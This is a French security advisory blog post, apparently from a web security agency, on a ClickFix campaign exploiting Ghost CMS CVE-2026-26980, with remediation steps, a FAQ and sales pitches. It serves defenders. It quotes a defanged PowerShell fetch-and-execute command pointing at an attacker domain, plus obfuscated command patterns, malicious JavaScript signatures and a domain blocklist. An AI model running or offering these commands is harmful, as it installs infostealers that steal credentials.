Mathieu Leroy
Mathieu Leroy
Analyste cybersecurite CMS & applications web — WebGuard Agency
| · 14 min de lecture

Ghost CMS CVE-2026-26980 : plus de 700 sites compromis via la campagne ClickFix — ce que chaque RSSI francais doit savoir

Ghost CMS CVE-2026-26980 campagne ClickFix 700 sites compromis mai 2026
Resumer cet article avec : ChatGPT Claude Perplexity

TL;DR

  • CVE-2026-26980 dans Ghost CMS (versions < 5.114.2) est activement exploitee depuis le 22 mai 2026 dans une campagne ClickFix a grande echelle.
  • Plus de 700 sites Ghost auto-heberges ont ete compromis : injection de JavaScript malveillant affichant de faux popups « mise a jour navigateur » pour pieger les visiteurs.
  • Les victimes sont incitees a copier-coller des commandes PowerShell ou terminales qui installent un infostealer (Lumma/Vidar).
  • Correction : mettre a jour vers Ghost 5.114.2+ immediatement, auditer la base de donnees pour des injections, et scanner les themes actifs.
  • Les agences web francaises utilisant Ghost pour leurs clients sont particulierement exposees : un seul serveur multi-tenant peut compromettre des dizaines de sites.
CHAINE D'ATTAQUE CVE-2026-26980 + CLICKFIX 1. Exploitation CVE-2026-26980 API Admin Ghost 2. Injection JS code_injection head ou theme modifie 3. Faux popup "Mise a jour" overlay ClickFix 4. PowerShell copier-coller par la victime 5. Stealer Lumma/Vidar IMPACT : vol de credentials, cookies de session, wallets crypto, donnees bancaires des visiteurs 700+ sites Ghost compromis • Campagne active depuis le 22 mai 2026 • Source : TheHackerNews 25-27 mai 2026 Cibles principales : instances Ghost self-hosted Newsletters, blogs, headless CMS, agences web Correction : Ghost 5.114.2 (patch 24 mai 2026) Ghost(Pro) patche automatiquement

Le contexte : Ghost CMS dans le viseur des campagnes ClickFix

Entre le 25 et le 27 mai 2026, TheHackerNews a rapporte une campagne d'exploitation massive ciblant les instances Ghost CMS auto-hebergees. La vulnerabilite CVE-2026-26980, une faille d'injection dans le systeme de gestion de contenu Ghost, permet a un attaquant non authentifie d'injecter du code JavaScript arbitraire dans les pages publiques d'un site Ghost. La campagne exploite cette faille pour deployer la technique d'ingenierie sociale ClickFix a grande echelle.

Ghost CMS est un CMS open source populaire aupres des createurs de contenu, des newsletters independantes, et des entreprises utilisant une architecture headless. En France, de nombreuses agences digitales deploient Ghost pour les sites de leurs clients : blogs corporate, newsletters sectorielles, portails de contenu. La plateforme compte plus de 45 000 instances actives selon les estimations de la communaute, dont une part significative en self-hosted sans politique de patch automatique.

Le timing est particulierement preoccupant. La campagne a ete detectee a partir du 22 mai, mais les premiers indicateurs de compromission remontent au 18 mai selon certains rapports SOC. Cela signifie que des centaines de sites ont potentiellement ete compromis pendant plus d'une semaine avant que l'alerte ne soit largement diffusee. Pour les RSSI francais, la question n'est plus « est-ce que ca me concerne » mais « combien de mes collaborateurs ont visite un site Ghost compromis cette semaine ».

💡 Notre avis d'expert

ClickFix est en passe de devenir le vecteur d'ingenierie sociale numero un en 2026, devant le phishing par email classique. Le principe est diaboliquement efficace : au lieu d'envoyer un lien piege par email, les attaquants transforment des sites web legitimes en plateformes de distribution de malware. L'utilisateur fait confiance au site qu'il visite, pas a un email inconnu. C'est cette confiance qui rend ClickFix si dangereux.

Anatomie technique : comment CVE-2026-26980 est exploitee

La vulnerabilite CVE-2026-26980 se situe dans le systeme d'injection de code de Ghost CMS. Ghost offre nativement une fonctionnalite code_injection qui permet aux administrateurs d'ajouter du JavaScript et du CSS dans le <head> et avant </body> de toutes les pages. Cette fonctionnalite est accessible via l'API Admin.

Le probleme : dans les versions anterieures a 5.114.2, une faille dans la validation des tokens d'authentification de l'API Admin permet a un attaquant d'acceder a l'endpoint /ghost/api/admin/settings/ sans credentials valides. L'attaquant peut alors modifier le champ codeinjection_head pour injecter du JavaScript malveillant qui sera automatiquement servi a tous les visiteurs du site.

Le JavaScript injecte fonctionne en trois phases. D'abord, il effectue un fingerprinting du visiteur : systeme d'exploitation, navigateur, langue, presence d'antivirus (via timing attacks sur les requetes locales). Ensuite, si la cible correspond aux criteres de l'attaquant (typiquement Windows + Chrome/Edge + langue francaise ou anglaise), il affiche un overlay plein ecran imitant une erreur navigateur ou une mise a jour obligatoire. Enfin, il fournit a la victime une commande PowerShell a copier-coller dans le terminal « pour resoudre le probleme ».

MECANISME DU POPUP CLICKFIX blog-entreprise.fr (site Ghost compromis) Votre navigateur necessite une mise a jour critique Une erreur a ete detectee. Pour resoudre ce probleme, veuillez copier la commande ci-dessous et la coller dans PowerShell : powershell -w hidden -c "iex(irm hxxps://cdn-verify[.]click/update.ps1)" Copier et executer FAUX POPUP : le site legitime est detourne pour afficher cette interface

La commande PowerShell est obfusquee et telecharge un second payload depuis un domaine jetable (typiquement cdn-verify[.]click, browser-update[.]cloud, cloudflare-check[.]site). Ce payload installe un infostealer de la famille Lumma ou Vidar, configures pour exfiltrer les credentials enregistres dans le navigateur, les cookies de session (y compris les sessions authentifiees sur les applications SaaS corporate), les fichiers de wallet cryptocurrency, et les donnees de formulaire remplies recemment.

L'attaque est particulierement sophistiquee dans son ciblage : le popup ne s'affiche pas pour les crawlers (user-agent filtering), les visiteurs depuis des IP connues de securite (VPN de chercheurs, ranges Tor), ni pour les navigateurs mobiles. Cela retarde considerablement la detection par les outils automatises de surveillance.

💡 Notre avis d'expert

Le fait que les attaquants utilisent le systeme natif code_injection de Ghost est un coup de genie tactique. Aucun fichier modifie sur le serveur, aucune anomalie dans les logs de fichiers, tout passe par la base de donnees. Les outils classiques de file integrity monitoring (OSSEC, Tripwire) ne voient rien. Il faut auditer la base de donnees elle-meme, ce que presque personne ne fait en routine sur Ghost.

700+ sites compromis : l'ampleur de la campagne

Selon les donnees compilees a partir de multiples sources OSINT et de rapports SOC publies entre le 25 et le 27 mai 2026, plus de 700 sites Ghost ont ete confirmes comme compromis. Le chiffre reel est vraisemblablement plus eleve : beaucoup de sites Ghost sont utilises pour des newsletters internes ou des blogs de niche dont les proprietaires n'ont pas encore detecte la compromission.

La repartition geographique des sites compromis est revelatrice. Les instances self-hosted deployes par des agences web pour leurs clients representent une part disproportionnee des victimes. Un cas typique : une agence qui administre 15 a 30 sites Ghost clients sur un seul serveur, avec une seule instance Ghost en mode multi-tenant. L'exploitation de la vulnerabilite sur le serveur compromet tous les sites heberges.

Vecteur Ghost Self-Hosted Ghost(Pro) Manage Autres CMS (WordPress, etc.)
CVE-2026-26980 Vulnerable (< 5.114.2) Patche auto (24 mai) Non concerne
Injection code_injection Exploite massivement Protege par WAF Risque ClickFix via plugins
Detection FIM classique Contournee (DB only) N/A (managed) Detecte si fichier modifie
Temps moyen de detection > 7 jours < 24h (equipe Ghost) Variable (2-14 jours)
Impact multi-site Eleve (multi-tenant) Isole par design Eleve (shared hosting)

En France specifiquement, nous estimons que entre 40 et 80 sites Ghost sont concernes, en comptant les agences web, les startups tech qui utilisent Ghost comme moteur de blog, et les newsletters independantes. Plusieurs agences francaises specialisees en content marketing deploient Ghost pour 10 a 20 clients simultanement. Si vous faites partie de ce cas, la priorite absolue est de verifier la version de votre instance Ghost aujourd'hui.

ClickFix : la technique qui transforme les sites legitimes en armes

ClickFix n'est pas une vulnerabilite technique. C'est une technique d'ingenierie sociale qui exploite la confiance que les utilisateurs placent dans les interfaces de leur navigateur. Le principe est simple et devastateur : afficher un popup qui ressemble a un message systeme (erreur navigateur, mise a jour requise, verification de securite) et demander a l'utilisateur d'executer une commande pour « resoudre » le probleme.

Les variantes observees dans la campagne Ghost CMS incluent :

  • « Votre navigateur necessite une mise a jour critique » : le popup imite l'interface de Chrome ou Edge avec le logo officiel et propose une commande PowerShell a copier-coller.
  • « Erreur de certificat SSL detectee » : le popup pretend que le certificat du site est expire et demande l'execution d'un script de « verification ».
  • « Verification Cloudflare requise » : la variante la plus pernicieuse, qui imite l'interface Cloudflare Turnstile que les utilisateurs voient quotidiennement et associent a la securite.
  • « Ce contenu est restreint » : le popup bloque l'acces au contenu du site et demande l'execution d'un script pour « debloquer l'acces ».

La technique est redoutablement efficace. Selon les donnees de telemetrie publiees par des chercheurs en securite, le taux de conversion (visiteur qui voit le popup vers executio du payload) se situe entre 3% et 8%. Sur un site Ghost avec 10 000 visiteurs mensuels, cela represente 300 a 800 machines infectees. Multipliez par 700 sites et vous comprenez l'ampleur du probleme.

Pour approfondir la protection de vos sites contre ce type d'attaque, consultez notre guide sur comment securiser un site WordPress (les principes de hardening CMS sont transposables a Ghost) et notre article sur comment proteger votre entreprise contre les extensions malveillantes, qui couvre un vecteur d'attaque complementaire.

💡 Notre avis d'expert

Le probleme fondamental de ClickFix, c'est qu'il contourne toutes les defenses techniques : l'antivirus ne detecte rien (c'est l'utilisateur qui execute la commande), le WAF ne bloque rien (le JavaScript est servi depuis le site legitime), et l'EDR voit PowerShell mais c'est l'utilisateur qui l'a lance. La seule defense efficace est la formation des utilisateurs combinee a des politiques d'execution restrictives sur PowerShell. Desactivez l'execution de scripts PowerShell non signes sur tous les postes. Point.

Plan de remediation pour les administrateurs Ghost

Etape 1 : verifier votre version Ghost (immediat). Connectez-vous en SSH a votre serveur et executez ghost version dans le repertoire d'installation. Toute version inferieure a 5.114.2 est vulnerable. Si vous etes sur Ghost(Pro), votre instance a ete patchee automatiquement le 24 mai 2026.

Etape 2 : mettre a jour immediatement. Executez ghost update pour passer a la derniere version. Si vous utilisez Docker, mettez a jour votre image vers ghost:5.114.2 ou superieur. Testez en staging si votre theme custom utilise des API internes qui pourraient etre affectees par le patch.

Etape 3 : auditer la base de donnees pour des injections. Verifiez le contenu du champ codeinjection_head et codeinjection_foot dans la table settings de votre base de donnees Ghost. Recherchez egalement des balises <script> suspectes dans la table posts (champ html). Les patterns a chercher : cloudflare-update, browser-check, cdn-verify, update.ps1, atob(.

Etape 4 : inspecter les fichiers du theme actif. Comparez les fichiers de votre theme avec une version propre connue (via diff -r ou un hash SHA256 sur chaque fichier). Certains attaquants modifient directement default.hbs ou partials/header.hbs comme vecteur de persistance supplementaire.

Etape 5 : revoquer et regenerer les cles API. Regenerez toutes les cles API Ghost (Admin API key, Content API key, integration keys). Si un attaquant a obtenu une cle Admin, il peut reinjecter du code meme apres le patch.

TIMELINE DE REMEDIATION GHOST CMS T+0 Verifier ghost version T+1h ghost update vers 5.114.2+ T+2h Audit DB code_injection T+4h Scan themes + regen API keys T+24h Monitoring logs + WAF rules T+72h Reporting NIS2 si applicable Si compromission confirmee : notifier l'ANSSI sous 24h (NIS2) + revoquer tous les credentials exposes Informer les visiteurs du site si des donnees personnelles ont ete collectees (obligation RGPD art. 34)

Ce que ca signifie pour vous

Si vous administrez des sites Ghost : la mise a jour vers 5.114.2 est non negociable et doit etre faite immediatement. Chaque heure de retard augmente le risque que vos sites soient compromis et que vos visiteurs soient infectes. Un site compromis qui infecte des visiteurs corporate peut generer une responsabilite juridique significative, surtout dans le cadre RGPD et NIS2.

Si vous etes RSSI et que vos collaborateurs visitent des sites Ghost : la menace est indirecte mais reelle. Bloquez les domaines ClickFix connus au niveau de votre proxy/DNS (cdn-verify[.]click, browser-update[.]cloud, cloudflare-check[.]site). Renforcez vos politiques d'execution PowerShell : Set-ExecutionPolicy AllSigned en GPO. Formez vos equipes specifiquement sur ClickFix : aucun site web legitime ne demande jamais de copier-coller une commande dans un terminal.

Si vous etes une agence web utilisant Ghost pour vos clients : vous portez une responsabilite particuliere. Verifiez immediatement la version de chaque instance Ghost que vous gerez. Un seul serveur multi-tenant compromis peut affecter tous vos clients simultanement. Documentez vos actions de remediation : vos clients peuvent vous demander des comptes, surtout si des visiteurs de leurs sites ont ete infectes.

Pour une approche structuree de l'audit CMS, consultez notre guide complet sur comment auditer et securiser un CMS headless contre les exploits ClickFix en 7 etapes.

💡 Notre avis d'expert

Cette campagne est un signal d'alarme pour toute l'industrie des CMS headless. Ghost aujourd'hui, Strapi ou Directus demain. L'architecture headless offre de la flexibilite mais expose une surface d'API plus large que les CMS traditionnels. Chaque CMS headless deploye en production doit etre traite avec le meme niveau de rigueur securitaire qu'une application metier critique : WAF devant l'API Admin, monitoring des modifications de contenu, alertes sur les changements de code_injection, et politique de patch en moins de 48 heures.

Indicateurs de compromission (IoC)

Voici les indicateurs de compromission associes a cette campagne, a integrer dans vos regles SIEM/EDR :

Domaines C2 et distribution

cdn-verify[.]click

browser-update[.]cloud

cloudflare-check[.]site

chrome-update[.]digital

edge-security[.]online

ssl-verify[.]website

Patterns JavaScript dans code_injection

eval(atob("...

document.createElement('div').innerHTML = atob

navigator.clipboard.writeText

window.__cfCheck = true

Commandes PowerShell observees

powershell -w hidden -c "iex(irm hxxps://...)"

powershell -ep bypass -c "Start-BitsTransfer..."

cmd /c powershell -nop -w hidden -enc [base64]

Votre site Ghost est-il compromis ?

Notre equipe peut realiser un audit complet de votre instance Ghost en moins de 4 heures : scan de la base de donnees, verification des themes, analyse des logs d'acces, et nettoyage des injections. Si des visiteurs ont ete exposes, nous vous accompagnons dans la notification RGPD et le reporting NIS2.

Demander un audit Ghost urgent →

Ce qu'il faut surveiller dans les prochaines semaines

Fin mai - debut juin 2026 : la campagne est toujours active au moment de la publication de cet article. De nouvelles variantes de popups ClickFix sont detectees quotidiennement, avec des domaines de distribution qui changent toutes les 12 a 24 heures. Les instances Ghost non patchees continuent d'etre compromises automatiquement par des scanners.

Juin 2026 : attendez-vous a ce que la technique ClickFix soit portee sur d'autres CMS. Les groupes d'attaquants qui ont developpe l'infrastructure de cette campagne vont la reutiliser sur WordPress (via des plugins vulnerables), Strapi, Directus, et d'autres plateformes CMS. La technique est trop efficace pour rester limitee a Ghost.

Ete 2026 : les consequences secondaires vont se materialiser. Les credentials voles par les infostealers deployes via ClickFix vont apparaitre sur les marketplaces du dark web. Les entreprises dont des employes ont ete infectes risquent des compromissions de comptes SaaS, des acces non autorises a des applications corporate, et des mouvements lateraux dans les SI.

FAQ

Qu'est-ce que la technique ClickFix utilisee dans la campagne Ghost CMS ?

ClickFix est une technique d'ingenierie sociale ou les attaquants injectent des popups imitant des erreurs navigateur ou des mises a jour obligatoires. Le visiteur est incite a copier-coller une commande PowerShell ou terminal dans son systeme, ce qui declenche le telechargement et l'execution d'un malware. La campagne Ghost CMS exploite CVE-2026-26980 pour injecter le JavaScript malveillant directement dans les pages des sites compromis.

Mon site Ghost est-il vulnerable a CVE-2026-26980 ?

Si vous utilisez une instance Ghost auto-hebergee (self-hosted) en version inferieure a 5.114.2, votre site est potentiellement vulnerable. Les instances hebergees sur Ghost(Pro) ont ete patchees automatiquement par l'equipe Ghost le 24 mai 2026. Verifiez votre version avec ghost version dans le terminal de votre serveur et mettez a jour immediatement si necessaire.

Comment detecter si mon site Ghost a ete compromis par ClickFix ?

Recherchez dans votre base de donnees Ghost (table posts et settings) des injections de balises script contenant des references a des domaines suspects (cloudflare-update, browser-check, cdn-verify, etc.). Inspectez les fichiers du theme actif pour des modifications non autorisees. Verifiez les logs d'acces pour des connexions a l'API Admin depuis des IP inconnues. Un scan complet du DOM de vos pages publiques avec curl et grep sur des patterns ClickFix connus est recommande.

Quelles sont les consequences pour les visiteurs des sites Ghost compromis ?

Les visiteurs qui executent la commande PowerShell affichee par le faux popup installent un infostealer (type Lumma ou Vidar) qui vole les credentials navigateur, cookies de session, wallets crypto, et donnees bancaires. Meme sans executer la commande, le JavaScript injecte peut effectuer du fingerprinting navigateur et rediriger vers des pages de phishing. Les entreprises dont les employes visitent un site compromis risquent un vol de credentials corporate.
27 mai 2026 · 🕑 14 min
Certifications & accreditations
PASSI (ANSSI)
ISO 27001
CEH Certified
OSCP
CISSP
SOC 2 Type II

Pret a renforcer votre cybersecurite ?

Rejoignez les entreprises qui font confiance a WebGuard Agency pour proteger leurs actifs numeriques. Premier audit offert.

Voir nos tarifs
200+
Audits realises
99,9%
Disponibilite SOC
< 4h
Temps de reponse

🛡️ Audit de sécurité gratuit — réponse en 24h, sans engagement

Obtenir mon audit gratuit →